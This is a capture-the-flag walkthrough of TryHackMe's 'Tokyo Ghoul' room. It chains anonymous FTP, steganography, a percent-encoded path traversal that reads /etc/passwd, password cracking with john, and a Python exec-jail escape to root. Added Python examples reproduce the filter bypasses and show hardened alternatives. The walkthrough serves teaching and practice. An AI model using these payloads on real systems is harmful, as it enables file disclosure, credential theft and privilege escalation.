TryHackMe | Tokyo Ghoul (official write-up)

0UR4N05
4 min readMar 15, 2021

Hello guys, it's ouranos again. In this write-up I will solve the Tokyo Ghoul room from TryHackMe.

Where am i ?

We start with a quick nmap scan (-A for version detection and default scripts, -T4 for speed):

┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $sudo nmap -A -T4 $IP

As we can see, there are 3 open ports:

21: FTP, with anonymous login allowed

22: SSH

80: HTTP, Apache on Ubuntu

Planning to escape

Knowing the open ports, I browse the website and inspect the page source, looking for anything suspicious.

After a while I found a note in jasonroom.html that hints at the FTP server, so let's connect to it:

┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $ftp $IP

After browsing through some directories on the FTP server I found 2 files, and downloaded them with get:

ftp> get rize_and_kaneki.jpg

ftp> get need_to_talk

Once downloaded, we can see that need_to_talk is an executable and rize_and_kaneki.jpg is a JPEG image. I executed the program.

The executable waits for a passphrase; I used strings to pull it out of the binary:

┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $strings need_to_talk

Given the right passphrase, the program printed another string. Since it looks related to the picture, I used it as the steghide passphrase to extract hidden data from the jpg.

Steghide extracts a txt file with an encoded string. Decode it with CyberChef, applying the operations in this order:

From Morse Code → From Hex → From Base64
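The same three-step decode done in Python, as an added example that is not part of the original write-up. It assumes the Morse letters are separated by single spaces (CyberChef's default), and the sample string is constructed here (it is the word "kaneki" run through the inverse chain), not the room's actual file:

```python
import base64

# International Morse for letters and digits: a hex string only needs 0-9 and A-F.
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}
MORSE_REV = {v: k for k, v in MORSE.items()}


def from_morse(text):
    """Letters separated by one space, words by ' / ' (CyberChef's default)."""
    words = text.strip().split(" / ")
    return " ".join("".join(MORSE[sym] for sym in w.split()) for w in words)


def from_hex(text):
    return bytes.fromhex(text.replace(" ", "")).decode()


def from_base64(text):
    return base64.b64decode(text).decode()


def decode_chain(morse):
    """Morse -> hex -> base64, the order of the CyberChef recipe above."""
    return from_base64(from_hex(from_morse(morse)))


def encode_chain(plaintext):
    """Inverse chain, used here only to build a constructed sample."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    hexed = b64.encode().hex().upper()
    return " ".join(MORSE_REV[c] for c in hexed)


# Constructed sample (not the room's file): encode_chain("kaneki").
SAMPLE_MORSE = ("-.... .---- ...-- ..--- ....- -.... --... ..... ..... .- "
                "..... --... --... ....- --... -----")

if __name__ == "__main__":
    print(decode_chain(SAMPLE_MORSE))
```

Decoding an intermediate step by hand (for example checking that the Morse output is all hex digits) is the quickest way to confirm you have the layers in the right order.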

What Rize is trying to say?

We found the hidden directory. It needs to be scanned as well, so let's run dirb against it:

┌─[ouranos@parrot]─[~/ctf/thm/tokyo]
└──╼ $sudo dirb http://$machine_IP/secret_directory

dirb finds another directory.

After clicking around in it I noticed this parameter, which loads a file from the server:

index.php?view=flower.gif

Maybe we can change it to traverse back up the filesystem and read /etc/passwd.

The plain ../../../etc/passwd did not work, but we now know there is a file inclusion vulnerability here, so we bypass the filter by URL (percent) encoding the path:

?view=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
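A small offline model of the view parameter, added here as an example and not taken from the room's source. The page does not show the server-side filter, so the block assumes a single-pass str_replace-style filter for illustration; the `....//` bypass shown against it is the standard one for that filter, not the page's own payload. The file layout is constructed, with secret.txt playing the role of /etc/passwd outside the web root, and safe_view is the hardened counterpart a practitioner would want next to the vulnerable one:

```python
import os
from tempfile import mkdtemp
from urllib.parse import unquote


def make_site():
    """Constructed stand-in for the target (not the room's files): www/images/
    holds flower.gif, and secret.txt sits two levels above it."""
    root = mkdtemp()
    images = os.path.join(root, "www", "images")
    os.makedirs(images)
    with open(os.path.join(images, "flower.gif"), "w") as f:
        f.write("GIF89a")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("constructed secret")
    return root, images


def naive_filter(view):
    """Assumed filter, not the room's code: delete '../' once, like PHP
    str_replace('../', '', $view). A single pass is not idempotent."""
    return view.replace("../", "")


def vulnerable_view(images, raw_param):
    """index.php?view=... as naive concatenation: percent-decode (the web server
    does this before PHP sees $_GET), filter once, then open images/<view>."""
    path = images + "/" + naive_filter(unquote(raw_param))
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None


def safe_view(images, raw_param):
    """Hardened form: resolve the final path and refuse anything outside images/."""
    base = os.path.realpath(images)
    target = os.path.realpath(os.path.join(base, unquote(raw_param).lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        return None
    try:
        with open(target) as f:
            return f.read()
    except OSError:
        return None


# What the page's encoded payload becomes once the server decodes it.
DECODED = unquote("%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd")  # "/../../../etc/passwd"

if __name__ == "__main__":
    root, images = make_site()
    for p in ["flower.gif", "..%2F..%2Fsecret.txt", "....//....//secret.txt"]:
        print(p, "->", vulnerable_view(images, p), "|", safe_view(images, p))
```

The point of safe_view is that it checks the resolved path, not the input string: no amount of encoding or dot-stuffing changes where realpath ends up, whereas every string-level blacklist has a sibling encoding it forgot.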

Voilà, we got /etc/passwd, and it contains a username together with a password hash. I'll crack the hash with john.

First, put the hash in a file:

┌─[ouranos@parrot]─[~/ctf/thm/twd/box]
└──╼ $echo '$hash' > hash.txt

Then crack it against rockyou:

┌─[ouranos@parrot]─[~/ctf/thm/twd/box]
└──╼ $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

After a while john finds the password; show the cracked result with:

┌─[ouranos@parrot]─[~/ctf/thm/twd/box]
└──╼ $john --show hash.txt

And we have our SSH credentials.

Privilege escalation:

Once on the box over SSH, I check our sudo permissions:

We are allowed to execute jail.py as root, so let's see what this script does.

#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()

This is our script. It passes whatever we type to exec, but first rejects the input if it contains any of the blacklisted substrings, which blocks the obvious ways of reading files or running commands. The check is only a case-sensitive substring match, so we can escape it by spelling the forbidden names in upper case and lowering them at runtime, reaching os.system through the built-in __import__:

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
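The blacklist and the bypass reproduced side by side, as an added example that is not part of the original write-up. The page's payload is kept as a string and only checked against the filter, not executed; the two payloads that are executed target os.getcwd() instead (an assumed harmless stand-in for the page's cat). The block passes the builtins module into exec explicitly because in CPython `__builtins__` is the module only in `__main__` and a plain dict in imported modules, which is why the `__builtins__.__dict__` form relies on jail.py being run as a script:

```python
import builtins

BLACKLIST = ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']


def is_blocked(text):
    """jail.py's check: a case-sensitive substring match, nothing more."""
    return any(keyword in text for keyword in BLACKLIST)


def jail(text):
    """Run text the way jail.py does, returning the namespace it ran in
    (None if the blacklist rejected it)."""
    if is_blocked(text):
        return None
    ns = {"__builtins__": builtins}  # module object, as in a script run as __main__
    exec(text, ns)
    return ns


# The page's payload: blocked words are written in upper case and lowered at
# runtime, so the input never contains a forbidden substring.
PAGE_PAYLOAD = ("__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
                ".__dict__['SYSTEM'.lower()]('cat /root/root.txt')")

# Same trick against a harmless target (assumed for demonstration): os.getcwd().
CWD_PAYLOAD = ("out = __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
               ".__dict__['GETCWD'.lower()]()")

# A second shape with the same effect: build the names from chr() and string
# concatenation and resolve them with getattr. Any blacklist of literal words
# is defeated by a string that is only assembled at run time.
CHR_PAYLOAD = ("out = getattr(__builtins__.__dict__[chr(95)*2+chr(105)+'mport'+chr(95)*2]"
               "('o'+'s'), 'getc'+'wd')()")

if __name__ == "__main__":
    for p in (PAGE_PAYLOAD, CWD_PAYLOAD, CHR_PAYLOAD):
        print("blocked" if is_blocked(p) else "passes filter", "|", p[:40], "...")
    print(jail(CWD_PAYLOAD)["out"])
```

There is no word you can add to BLACKLIST that closes this: the fix for an exec-based jail is not a longer blacklist but not handing untrusted text to exec at all, and certainly not under sudo.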

And finally we got root. Thank you for trying this room; I hope you enjoyed it and learned something new. -0UR4N05
